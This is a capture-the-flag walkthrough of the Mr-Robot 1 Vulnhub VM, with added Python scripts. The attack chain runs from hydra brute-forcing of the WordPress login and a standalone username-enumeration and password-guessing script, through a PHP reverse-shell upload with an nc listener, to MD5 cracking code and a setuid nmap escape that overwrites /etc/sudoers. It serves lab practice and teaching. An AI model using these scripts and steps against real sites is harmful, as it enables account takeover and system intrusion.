Mr-Robot 1 ~ Vulnhub Walkthrough

nmap -A 192.168.1.213

1. Returns ports 80 and 443 open; not a whole lot to work with…

[Screenshot: Mr Robot web page]

2. Start a dirbuster scan while I check out what each of the commands on that page does.

3. Dirbuster begins returning a bunch of directories showing that this website is a WordPress site!

4. Start a WordPress scan:

wpscan --url http://192.168.1.213

5. The WordPress scan mentions that a robots.txt is available:

robots.txt available under: ‘http://192.168.1.213/robots.txt’

6. Navigate to this page and this is shown:

[Screenshot: Robottxt.png]

7. Navigate to key-1-of-3.txt and we have our first key!


 

1. Navigate to fsocity.dic and download the file (6.6 MB).

The file looks like a wordlist with about 900k lines, a large share of them duplicates; it is worth deduplicating it (sort -u) before using it for anything online.

Will keep this in mind for potential brute forcing later.

2. Go to the wp-admin page to see what we can find.

“user” as a potential username?

[Screenshot: wp-admin login page]

The site runs on plain HTTP, so the login request can be viewed in Burp in the clear:

Here I used username “user” and password “THEREISNOSPOON”.

[Screenshot: Burp output.png]

3. When you type in an incorrect username on WordPress it tells you “Invalid username”, so the login form is a username oracle. I created this hydra one-liner to brute force usernames until it finds a response that does not contain “Invalid username” (the form posts to /wp-login.php; hydra's module for that is http-post-form):

hydra 192.168.1.213 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username" -L Desktop/fsocity.dic -p asdf -t 10 -w 30 -o output.txt

Caveat: hydra reports a hit for any response that lacks the failure string, so a 404 from a mistyped path, a timeout or a blocked request shows up as a false positive. Verify hits by hand.

4. This command runs hydra to brute force potential usernames!

The username Elliot popped up!

I confirmed this by logging in as Elliot with a random password.

Sure enough, I get a bad-password error.

5. I now edit the command to brute force the password.

Whenever the password I entered was incorrect, I got “The password you entered for the username…”

hydra 192.168.1.213 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered" -P Desktop/fsocity.dic -l elliot -t 10 -w 30 -o output.txt

6. I ran this and the first 10000 passwords didn’t work, so I decided to start from the back. I didn’t feel like waiting for all 850k, so I started from the end of the list in case Jason decided to be a troll.

I ran the last 10000 passwords, but hydra got stuck: one of the child processes did not complete. I guessed that this meant the password must be in these last 10000. I cut it down to the last 1000 and tried again; it still got stuck. I realised that all the child processes were iterating, so for them to get stuck they must have done so in the last 10-15 passwords: we cannot tell whether the children moved on, because there are no more passwords to check. I ran the last 15 passwords and it still got stuck!

7. At this point I plugged in all 15 passwords manually.

The password was ER28-0652.

Now we are met with a wordpress site.

[Screenshot: wordpress.png]
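The two error messages above make wp-login.php an oracle, and the hydra runs are just a way of asking it. The script below is an added example (my own code, not the author’s hydra one-liners) that does the same two steps with only the standard library and avoids hydra’s false-positive problem by requiring positive evidence of a login (a redirect into wp-admin or a wordpress_logged_in cookie) before reporting a password. The failure strings are the ones quoted in the walkthrough; they differ between WordPress versions, so confirm them with one manual attempt first. The target URL, wordlist path and form field names are assumptions.

```python
#!/usr/bin/env python3
"""Username enumeration and password guessing against wp-login.php, driven by the two
error messages quoted in this walkthrough.  Added example, not the author's hydra run."""
import sys
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

# Failure strings as quoted in the walkthrough (assumed; they vary between WordPress versions).
NO_SUCH_USER = "Invalid username"
BAD_PASSWORD = "The password you entered for the username"


def classify(status, headers, body):
    """Map one wp-login.php response to 'no-such-user', 'bad-password', 'success' or 'unknown'.

    'success' needs positive evidence (302 into wp-admin, or a wordpress_logged_in cookie).
    A 404 from a mistyped path, a timeout or a block page therefore comes back 'unknown'
    instead of being reported as a valid login, which is the false positive a hydra
    failure-string run produces."""
    if NO_SUCH_USER in body:
        return "no-such-user"
    if BAD_PASSWORD in body:
        return "bad-password"
    location = headers.get("Location", "") or ""
    cookie = headers.get("Set-Cookie", "") or ""
    if (status in (301, 302) and "wp-admin" in location) or "wordpress_logged_in" in cookie:
        return "success"
    return "unknown"


def dedupe(lines):
    """Strip, drop blanks and repeats, keep first-seen order.  fsocity.dic is heavily
    duplicated, so this removes most of the requests an online attack would otherwise send."""
    seen, out = set(), []
    for line in lines:
        word = line.strip()
        if word and word not in seen:
            seen.add(word)
            out.append(word)
    return out


def load_wordlist(path):
    with open(path, encoding="latin-1") as fh:
        return dedupe(fh)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface the 302 that follows a successful login instead of following it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url, user, password, timeout=10):
    """POST one credential pair to /wp-login.php and classify the response."""
    opener = urllib.request.build_opener(_NoRedirect, urllib.request.HTTPCookieProcessor(CookieJar()))
    form = urllib.parse.urlencode({"log": user, "pwd": password, "wp-submit": "Log In", "testcookie": "1"})
    req = urllib.request.Request(base_url.rstrip("/") + "/wp-login.php", data=form.encode())
    try:
        resp = opener.open(req, timeout=timeout)
        return classify(resp.getcode(), resp.headers, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:          # 302 (login ok), 403, 404, 5xx all land here
        return classify(err.code, err.headers, err.read().decode("utf-8", "replace"))
    except (urllib.error.URLError, OSError):       # timeout, connection refused
        return "unknown"


def enumerate_user(base_url, candidates):
    """A candidate that yields 'bad-password' rather than 'no-such-user' is a real account."""
    for name in candidates:
        if probe(base_url, name, "not-the-password") == "bad-password":
            return name
    return None


def brute_password(base_url, user, candidates):
    for pw in candidates:
        if probe(base_url, user, pw) == "success":
            return pw
    return None


if __name__ == "__main__":
    # usage: wplogin.py http://192.168.1.213 fsocity.dic   (hypothetical invocation)
    base, words = sys.argv[1], load_wordlist(sys.argv[2])
    user = enumerate_user(base, words)
    print("user:", user)
    if user:
        print("password:", brute_password(base, user, words))
```

Requests are sent one at a time, so this is slower than hydra with 10 tasks; the point is the classification, which hydra cannot do with a single failure string. Deduplicating the wordlist first matters more than parallelism here.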

8. The first thing that comes to mind is a web shell.

9. Attempt to upload php-reverse-shell.php in the Media tab, but it is rejected: the file type “is not allowed for security reasons”.

10. I just started uploading php-reverse-shell.php everywhere I could.

11. I tried to add it as a plugin and got an error, something like “plugin is not valid, failed to install”.

[Screenshot: plugins add new.png]

 

However, when I then looked at my media library, the reverse shell was there! For some reason, when a plugin fails to install, this version of WordPress leaves the uploaded file in the media directory…

12. Start a listener on the port configured in php-reverse-shell.php (the script’s $ip and $port variables must be set to the attacking machine before uploading it):

nc -lvp 36806

13. Navigated to the reverse shell at http://192.168.1.213/php-reverse-shell.php and bam, got a reverse shell!

[Screenshot: Reverse Shell.png]

14. Went into the home directory and found key 2 of 3.

[Screenshot: key2.jpg]

Except we can’t view it…

15. However! We can view the password hash.

cat password.raw-md5

 

16. This gives us a raw (unsalted) MD5 hash, which cracks instantly on http://crackstation.net.

The recovered password gets us the robot account:
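Crackstation is a lookup table; when it has no entry, or the engagement forbids sending hashes to a third party, the same thing is done offline against a wordlist. The script below is an added example (my own, not part of the walkthrough) that does that for a raw-MD5 file. The file format (user:hex, one per line, as John the Ripper’s raw-md5 mode reads it) and the sample lines are assumptions; the two digests in the sample are the RFC 1321 test vectors, not anything taken from the VM.

```python
#!/usr/bin/env python3
"""Offline wordlist attack on a raw (unsalted) MD5 hash file such as password.raw-md5.
Added example; the user:hex file format and the sample below are assumptions."""
import hashlib

# Constructed sample: both digests are RFC 1321 test vectors, not the VM's real file.
SAMPLE_HASH_FILE = """\
robot:c3fcd3d76192e4007dfb496cca67e13b
alice:900150983cd24fb0d6963f7d28e17f72
"""


def parse_hash_file(text):
    """Return [(user, hexdigest)]; a line without a colon is a bare hash with user ''."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.rpartition(":")
        digest = digest.lower()
        if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"not a raw MD5 digest: {line!r}")
        entries.append((user, digest))
    return entries


def mangle(word):
    """Cheap rule set applied to every wordlist entry, catching capitalised or
    digit-suffixed variants without needing a second wordlist."""
    yield word
    for variant in (word.lower(), word.upper(), word.capitalize(), word + "1", word + "123"):
        if variant != word:
            yield variant


def crack(entries, words):
    """Hash each candidate once and look it up against every target digest, so the cost is
    O(candidates + targets) rather than O(candidates * targets).  Stops once all are found."""
    targets = {}
    for user, digest in entries:
        targets.setdefault(digest, []).append(user)
    found = {}
    for word in words:
        for cand in mangle(word):
            digest = hashlib.md5(cand.encode("utf-8")).hexdigest()
            for user in targets.get(digest, ()):
                found.setdefault(user, cand)
        if len(found) == len(entries):
            break
    return found


def crack_file(hash_path, wordlist_path):
    with open(hash_path) as hf, open(wordlist_path, encoding="latin-1") as wf:
        return crack(parse_hash_file(hf.read()), (w.rstrip("\n") for w in wf))


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:          # e.g. crack.py password.raw-md5 fsocity.dic (hypothetical)
        print(crack_file(sys.argv[1], sys.argv[2]))
    else:
        print(crack(parse_hash_file(SAMPLE_HASH_FILE), ["password", "abc", "abcdefghijklmnopqrstuvwxyz"]))
```

Unsalted MD5 is why this is instant: one hash per candidate covers every user in the file at once, which is exactly the property a salted, slow hash (bcrypt, scrypt, Argon2) is meant to deny an attacker.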

su robot
Enter Password: abcdefghijklmnopqrstuvwxyz

 

 

su may refuse with “must be run from a terminal”, because the reverse shell has no pty.

17. Run this command to allocate a pty:

python -c "import pty;pty.spawn('/bin/bash')"

 

 

This “upgrades” your shell to one with a terminal, and su now works.

Now we can see that key!


 

1. At this point I sat here and struggled, trying to figure out what to do, so I took a peek at another walkthrough and saw the word nmap.

2. I found where nmap was located and realised it was version 3.81, ancient next to the current 7.x releases.

Tried to find an exploit for it, but no luck.

Just ran nmap --help and started looking at things.

3. After tinkering with a bunch of things, I finally booted into nmap --interactive.

I typed “h” to see the help and found that commands prefixed with “!” are run through a shell. This nmap binary is setuid root, so those commands run as root… (later nmap releases dropped --interactive, which is one more reason to check the version of every setuid binary you find.)

I thought there was no way something this vulnerable would exist…

4. Sure enough, I ran

! echo "robot ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers
sudo su

And obtained root. Went into the /root directory and found the last key. Note that the single “>” overwrites /etc/sudoers wholesale; anything after the “!” already runs as root, so a plain shell escape would have done the job without touching sudoers at all.
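The root cause was a setuid-root binary with a built-in command escape, and the author only found it after reading another walkthrough. The script below is an added example (my own, not from the walkthrough) of the enumeration step that would have surfaced it directly: walk the filesystem from a low-privilege shell, list every setuid/setgid file, and flag the root-owned ones whose names are known to offer shell escapes. The NOTABLE set is a small hand-picked list in the spirit of GTFOBins, not a complete one, and the temporary directory in self_test() is constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Enumerate setuid/setgid binaries from an unprivileged shell and flag known shell escapes.
Added example; NOTABLE is a hand-picked, incomplete list."""
import os
import stat
import tempfile

# Root-owned setuid copies of these are worth trying first (nmap --interactive on this box).
NOTABLE = {"nmap", "vim", "vi", "find", "less", "more", "bash", "sh", "python", "perl", "awk"}


def is_setuid(mode):
    return bool(mode & stat.S_ISUID)


def is_setgid(mode):
    return bool(mode & stat.S_ISGID)


def _under(path, prefixes):
    return any(path == p or path.startswith(p + "/") for p in prefixes)


def find_privileged(root="/", skip=("/proc", "/sys", "/dev")):
    """Return [(path, uid, mode)] for regular files under root carrying setuid or setgid.
    lstat is used so symlinks are neither followed nor misreported; directories the current
    user cannot read are skipped silently, as they would be for find(1) without sudo."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if _under(dirpath, skip):
            dirnames[:] = []            # do not descend into pseudo filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and (is_setuid(st.st_mode) or is_setgid(st.st_mode)):
                hits.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return hits


def notable(hits):
    """Root-owned hits whose basename is in NOTABLE: the first things to try."""
    return [h for h in hits if h[1] == 0 and os.path.basename(h[0]) in NOTABLE]


def report(hits):
    lines = []
    for path, uid, mode in sorted(hits):
        bits = ",".join(b for b, on in (("u+s", is_setuid(mode)), ("g+s", is_setgid(mode))) if on)
        flag = "  <-- known shell escape" if (path, uid, mode) in notable(hits) else ""
        lines.append(f"{oct(mode)} uid={uid} {bits:<7} {path}{flag}")
    return "\n".join(lines)


def self_test():
    """Constructed check: a throwaway directory with one setuid file and one plain file."""
    with tempfile.TemporaryDirectory() as tmp:
        suid, plain = os.path.join(tmp, "nmap"), os.path.join(tmp, "readme")
        for p in (suid, plain):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\n")
        os.chmod(suid, 0o4755)
        os.chmod(plain, 0o755)
        return [os.path.basename(p) for p, _, _ in find_privileged(tmp)]


if __name__ == "__main__":
    import sys
    print(report(find_privileged(sys.argv[1] if len(sys.argv) > 1 else "/")))
```

On a real target this is the Python equivalent of `find / -perm -4000 -type f 2>/dev/null`; the added value is the owner check and the flagging, so that an unusual root-owned copy of nmap under /usr/local/bin stands out from the dozen setuid binaries every distribution ships.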
